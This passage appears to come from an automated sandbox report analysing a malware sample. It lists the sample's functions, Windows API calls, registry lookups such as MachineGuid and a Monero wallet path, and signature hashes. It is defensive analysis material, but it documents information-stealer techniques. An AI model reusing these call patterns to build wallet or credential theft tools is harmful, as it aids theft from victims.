                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                            • String ID: `zA
                                                                                                                                                                                                                            • API String ID: 3891774339-1671295560
                                                                                                                                                                                                                            • Opcode ID: 066c27c9bfc9e7f6ad6534efeb46c7e4abe93aeb0c28d1204730cf2f1c20d2e9
                                                                                                                                                                                                                            • Instruction ID: 5b88c90ae33bdd982dfe1728eea4547c1d5cd29ce4f781e2148dc13bcd14f5b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066c27c9bfc9e7f6ad6534efeb46c7e4abe93aeb0c28d1204730cf2f1c20d2e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E419F7294011D9FDF24EF60EC86EE9777ABB08309F0004AAA509A31A1DE759FC5CF94
                                                                                                                                                                                                                            Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                            • LocalFree.KERNEL32(0040EC91,?,?,?,?,0040E72B,?,?,?), ref: 0040802B
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                            • String ID: +@
                                                                                                                                                                                                                            • API String ID: 2311089104-396005422
                                                                                                                                                                                                                            • Opcode ID: d2fff167fb3d7733026eac0e62b508efa91648d8dc83ae773f2aa49c1a23bce4
                                                                                                                                                                                                                            • Instruction ID: 807723f2e51248c8f2f98e616b696bb7d0540dc5137f9c813bae56d6ea2df898
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2fff167fb3d7733026eac0e62b508efa91648d8dc83ae773f2aa49c1a23bce4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38115B70900204EFDF25DFA4DD88EAF7BB9EB48741F20056AF481B6290DB769A85DB11
                                                                                                                                                                                                                            Function 004115A9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004115DC
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
                                                                                                                                                                                                                            • CharToOemA.USER32(?,?), ref: 00411640
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                            • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                            • Opcode ID: 68cd65d66c8ef3e8d798de7d8bc93d3c2eb6c97baab99793a2fa708540bc2a72
                                                                                                                                                                                                                            • Instruction ID: 0c83f0933e3d79f190a56af7a1f9b34225ce39da16332cf8d5c5010bc6302d27
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68cd65d66c8ef3e8d798de7d8bc93d3c2eb6c97baab99793a2fa708540bc2a72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC111EB590031DAFDB10DF50DD89EEBB7BCEB14305F0041E6A659A2052D6759F888F14
                                                                                                                                                                                                                            Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • wallet_path, xrefs: 00401A9C
                                                                                                                                                                                                                            • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                            • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                            • Opcode ID: 4c46b1201ff9761030c398912daf31265311d0f66d453ecaabbf3bbf6140d472
                                                                                                                                                                                                                            • Instruction ID: 92b2f9e045c5b5207c0b148378cab8b7dc165f74e5b7e8567bff09acb3cd1950
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c46b1201ff9761030c398912daf31265311d0f66d453ecaabbf3bbf6140d472
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFF03AB5680304BFEB149B90DC0EFAA7A6DEB44B02F241065B601B61A0D6B2AB409A24
                                                                                                                                                                                                                            Function 00415E39 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415EC8
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415EE5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F04
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F18
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F2B
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F3F
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F52
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B72
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: HeapAlloc.KERNEL32(00000000), ref: 00415B79
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415B92
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: FindFirstFileA.KERNEL32(?,?), ref: 00415BA9
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA0), ref: 00415BCA
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA4), ref: 00415BE4
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415C0B
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00415CC8
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: DeleteFileA.KERNEL32(?), ref: 00415CEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1546541418-0
                                                                                                                                                                                                                            • Opcode ID: c43e715f51a4f7d07e52a940ad5ccd9ed82cf7af24d17ea031d1748575949e0f
                                                                                                                                                                                                                            • Instruction ID: 7dc01911de5a27ce42729b7201da88ca55e32236458749eb9618a777644b2718
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c43e715f51a4f7d07e52a940ad5ccd9ed82cf7af24d17ea031d1748575949e0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF51EDB1A0011C9BCF64DB64DC85ADDB7F9AB4C311F4044EAF609E3260EA35ABC98F54
                                                                                                                                                                                                                            Function 00410B05 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B4E
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B6A
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: Windows 11
                                                                                                                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                            • Opcode ID: eff4407981480f29a3e8c3abb8119370cc6538536529693400870beae5f7a9d1
                                                                                                                                                                                                                            • Instruction ID: 0bec989384f0a7c66584ec76c5164b6df09d4e667c826edd8b17caab73b46526
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eff4407981480f29a3e8c3abb8119370cc6538536529693400870beae5f7a9d1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F04475600304FBEF149BD1DC4EFAE7A6EEB44705F141055B601961E0D7B5AA80D725
                                                                                                                                                                                                                            Function 00410B7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B92
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B99
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BB7
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ), ref: 00410BD2
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BDB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                            • Opcode ID: 3182c4627f195be221e76e344ca264d351bdd3646ceab104d6e5169a5afc3c7d
                                                                                                                                                                                                                            • Instruction ID: 16525d27e18a6f6eb50ada141e8e48f6afa079728c5f11f74ebe8399e0be2e3b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3182c4627f195be221e76e344ca264d351bdd3646ceab104d6e5169a5afc3c7d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4F09071640304FBFF149B91DC0FFAE7A7EEB44B06F140059F701A50A0D6B2AB809B14
                                                                                                                                                                                                                            Function 0041172C Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00411733
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,004118D6,?), ref: 00411756
                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00411763
                                                                                                                                                                                                                            • _wtoi64.MSVCRT ref: 00411796
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004117AF
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004117B6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 181426013-0
                                                                                                                                                                                                                            • Opcode ID: 94a9f91ccacc7efa5da4f735102b9eaf6ebfce10aa4b3815ebcfd38f894d266d
                                                                                                                                                                                                                            • Instruction ID: f8cdbbbe70d397e706f906296cdeba407d3bbd7863d046f8457389d6b98cb90c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9f91ccacc7efa5da4f735102b9eaf6ebfce10aa4b3815ebcfd38f894d266d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90114C74A0424ADFCF009FA4D8989EEBBB5AF49310F64417EF215E73A0DB394945CB68
                                                                                                                                                                                                                            Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,0041850E), ref: 00401100
                                                                                                                                                                                                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
